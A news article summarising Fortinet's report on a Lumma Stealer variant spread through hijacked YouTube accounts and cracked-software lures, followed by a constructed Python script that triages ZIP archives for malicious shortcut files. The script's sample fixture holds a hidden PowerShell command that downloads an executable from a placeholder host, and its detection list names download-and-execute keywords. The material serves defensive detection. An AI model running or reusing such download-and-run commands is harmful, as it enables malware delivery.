Beware of malware spreading via YouTube: downloads keep rising
On January 8 (US time), Fortinet reported in "Deceptive Cracked Software Spreads Lumma Variant on YouTube | FortiGuard Labs" that it had discovered a threat group abusing YouTube to distribute a variant of the information-stealing malware "Lumma Stealer".
Deceptive Cracked Software Spreads Lumma Variant on YouTube | FortiGuard Labs
○ Shortened URLs to malicious files are embedded in the videos
The threat group has been observed compromising YouTube accounts and uploading, from those hijacked accounts, videos that promote cracked software. The videos embed shortened URLs pointing to malicious files, which lure viewers into following them.
The shortened URLs resolve to open-source platforms such as GitHub and MediaFire, apparently in order to evade filter-based protections. According to Fortinet, the videos identified in this case were uploaded early this year, but the malicious files they link to are updated periodically and the number of downloads continues to rise, so Fortinet is urging caution.
Attack flow (Source: Fortinet)
○ What the malicious file actually contains
The malicious file is a ZIP archive containing a shortcut (link) file that uses PowerShell to download a malicious installer. Opening the shortcut ultimately installs the information-stealing malware. The malware loader unpacked during installation includes environment checks, anti-antivirus measures, and anti-debugging measures, which Fortinet identifies as functions intended to hinder analysis.
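As an added, constructed example (not from the article or from Fortinet's report): a Python triage script that opens a ZIP in memory, identifies Shell Link (.lnk) members by their header rather than their file extension, and flags those whose UTF-16LE string data references PowerShell and download commands, which is the chain described above. The sample archive, the `example.invalid` URL and the fake shortcut bytes are all constructed; a real shortcut stores its arguments in structured StringData fields that a full LNK parser would decode, so this is a first-pass filter, not a verdict.

```python
import io
import zipfile

# Shell Link (.lnk) files start with HeaderSize 0x4C followed by the
# LinkCLSID 00021401-0000-0000-C000-000000000046, stored little-endian.
LNK_MAGIC = bytes.fromhex("4c000000" "01140200" "0000" "0000" "c000000000000046")

# Substrings indicating a shortcut launches PowerShell to fetch and run a
# payload, the behaviour of the link file described in the article.
MARKERS = ("powershell", "pwsh", "invoke-webrequest", "iwr ", "downloadfile",
           "downloadstring", "invoke-expression", "iex", "-w hidden", "http")

def lnk_markers(data: bytes):
    """Markers found in a shortcut's UTF-16LE strings; None if not a Shell Link."""
    if not data.startswith(LNK_MAGIC):
        return None
    # LNK strings are UTF-16LE and may sit at odd offsets, so search both alignments.
    views = [data[o:].decode("utf-16-le", errors="ignore").lower() for o in (0, 1)]
    return [m for m in MARKERS if any(m in v for v in views)]

def triage_zip(zip_bytes: bytes) -> dict:
    """Map every Shell Link in a ZIP (detected by content, not extension) to its markers."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            hits = None if info.is_dir() else lnk_markers(zf.read(info))
            if hits is not None:
                findings[info.filename] = hits
    return findings

def fake_lnk(command: str) -> bytes:
    """Constructed stand-in for a .lnk: real header magic padded to 0x4C bytes,
    then a UTF-16LE command string where a real shortcut keeps its arguments."""
    return LNK_MAGIC.ljust(0x4C, b"\x00") + command.encode("utf-16-le")

def sample_zip() -> bytes:
    """Constructed archive shaped like the lure: a 'cracked software' bundle whose
    shortcut runs PowerShell to download the actual installer (URL is a placeholder)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("README.txt", "Run Setup to install.")
        zf.writestr("Setup.lnk", fake_lnk('powershell -w hidden -c "iwr http://example.invalid/i.exe -OutFile i.exe"'))
        zf.writestr("Manual.pdf", fake_lnk("notepad.exe manual.txt"))  # shortcut hiding behind .pdf
    return buf.getvalue()

if __name__ == "__main__":
    for name, hits in triage_zip(sample_zip()).items():
        print(name, "->", ", ".join(hits) or "shortcut, no markers")
```

Because detection keys on the LNK header, a shortcut renamed to look like a document (the `Manual.pdf` member) is still surfaced even when its command line is harmless.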
The Lumma Stealer variant that is ultimately installed can steal a wide range of information, including system data, browser data, and cryptocurrency wallets. It also establishes a connection to a command-and-control (C2) server, and it can process requests from that server over HTTPS and transmit the stolen information.
To avoid such attacks, Fortinet recommends being wary of suspicious software and using only legitimate software distributed from trusted official sites. Fortinet has also published the indicators of compromise (IoCs) identified in this analysis, and organizations are encouraged to make use of them as needed.